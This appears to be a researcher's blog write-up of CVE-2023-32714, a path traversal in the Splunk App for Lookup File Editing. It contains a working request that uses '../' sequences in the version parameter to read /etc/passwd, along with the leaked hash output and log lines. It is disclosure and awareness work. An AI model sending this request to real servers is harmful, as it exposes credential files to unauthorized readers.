CVE-2023-32714 Splunk App for Lookup File Editing, PoC exploit for path traversal
This time I have analyzed the vulnerability of CVE-2023-32714 Path Traversal in Splunk App for Lookup File Editing.
I checked the vulnerability how a (low-privileged) Splunk user can, if this App is installed, do a path traversal.
Taking a diff of App version 3.6.0 and 4.0.1 the __init__.py shows a new section
if version is not None:
version = os.path.basename(version)
ok, let’s dig deeper, start the App http://splunkserver:8000/en-US/app/lookup_editor/lookup_list
In App Lookup File Editing you can see a lot of predefined files like examples.csv or for a normal user read only files like registered_users
or you can create a new entry by Create a New Lookup button.
If you change the content, you will create a new version of the file and you can go back by the button Revert to a previous version and its drop down list.
You guess what comes next
If the lookup_file is at least present, the namespace/ lookup_type and owner needs to match, we try to load an older version of the file ;-)
lookup_contents?\
lookup_file=examples.csv (not the query 'lookup')
&namespace=splunk-dashboard-studio
&lookup_type=csv
&version=../../../../../../../../etc/passwd
&owner=nobody
Trigger the path traversal
http://vmu2004:8000/en-US/splunkd/__raw/services/data/lookup_edit/lookup_contents?lookup_file=examples.csv&namespace=splunk-dashboard-studio&lookup_type=csv&version=../../../../../../../../etc/passwd&owner=nobody
Response:
[[":admin:$6$xFG4uO8RpRr......::Administrator:admin::::19467"], [":user:$6$ZbdM6GA7kO........:::user::::19527"]]
less /opt/splunk/var/log/splunk/lookup_editor_rest_handler.log
06/19/2023 10:38:16 PM +0200 CEST INFO Resolved lookup file, path=/opt/splunk-9.0.3/etc/passwd
06/19/2023 10:38:16 PM +0200 CEST INFO Size of lookup file determined, file_size=293, path=/opt/splunk-9.0.3/etc/passwd
06/19/2023 10:38:16 PM +0200 CEST INFO Loading lookup file from path=/opt/splunk-9.0.3/etc/passwd
Company internal I started the game “security incident threat handling & response”. I like such “simple” things because we need more eye opener for security awareness in terms of faster installation of updates.
Splunk was already updated to 9.0.5, but the App was forgotten :-/
Reported to my IT at 22:00, update next day at 11:00. I was happy to lose the “game” because I thought it would last much longer.
Thank you for reading. The CVE is not my credit, but the work on the PoC exploit is powered by psytester, this post was only for my private fun. ;-)
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2023 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.